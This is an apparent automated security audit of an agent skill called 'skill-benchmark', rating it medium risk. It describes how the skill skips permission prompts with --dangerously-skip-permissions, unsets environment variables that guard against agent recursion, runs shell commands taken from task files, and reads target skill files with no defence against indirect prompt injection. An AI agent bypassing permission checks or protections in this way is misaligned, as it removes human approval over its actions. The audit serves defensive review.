skills/workersio/spec/skill-benchmark/Gen Agent Trust Hub

skill-benchmark

Warn

Audited by Gen Agent Trust Hub on Mar 25, 2026

Risk Level: MEDIUMCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONPROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill executes sub-sessions using claude -p with the --dangerously-skip-permissions flag in SKILL.md and agents/runner.md. This bypasses the platform's standard requirement for human approval of tool use, allowing the sub-agent to perform file operations and shell commands autonomously.
  • [COMMAND_EXECUTION]: In agents/runner.md, the skill explicitly unsets protection environment variables (env -u CLAUDECODE -u CLAUDE_CODE_ENTRYPOINT) to bypass restrictions intended to prevent infinite agent recursion and uncontrolled execution chains.
  • [REMOTE_CODE_EXECUTION]: The scripts/run_checks.py script uses subprocess.run(cmd, shell=True) to execute arbitrary shell commands extracted from the runs_without_error section of benchmark task markdown files. This creates a significant execution surface for arbitrary commands if the task definition files are manipulated or incorrectly generated.
  • [PROMPT_INJECTION]: The skill utilizes a system prompt append technique (--append-system-prompt) in agents/runner.md to force sub-sessions to load the skill under test. While intended for methodology consistency, the specific instruction pattern used ('IMPORTANT: Before starting any work, you MUST...') mimics common prompt injection override tactics.
  • [INDIRECT_PROMPT_INJECTION]: The skill is susceptible to indirect injection because it reads and analyzes the full content of external SKILL.md files to generate its own benchmarking tasks.
  • Ingestion points: In SKILL.md Step 2, the agent reads the complete target skill file to extract domains and capabilities.
  • Boundary markers: There are no boundary markers or instructions to ignore embedded commands when processing the target skill's content.
  • Capability inventory: The skill has access to Bash (read/write/execute), Agent tool (launching graders), and the ability to run unrestricted sub-sessions via claude -p.
  • Sanitization: The skill does not sanitize or validate instructions extracted from the target skill before using them to auto-generate tasks, potentially allowing a malicious skill to influence the benchmark generator.
  • [DYNAMIC_EXECUTION]: The benchmarking process involves dynamic generation of task files in Step 3 which are then processed by execution and grading scripts, creating multiple points where instructions from data are converted into executable actions.
Audit Metadata
Risk Level
MEDIUM
Analyzed
Mar 25, 2026, 04:21 AM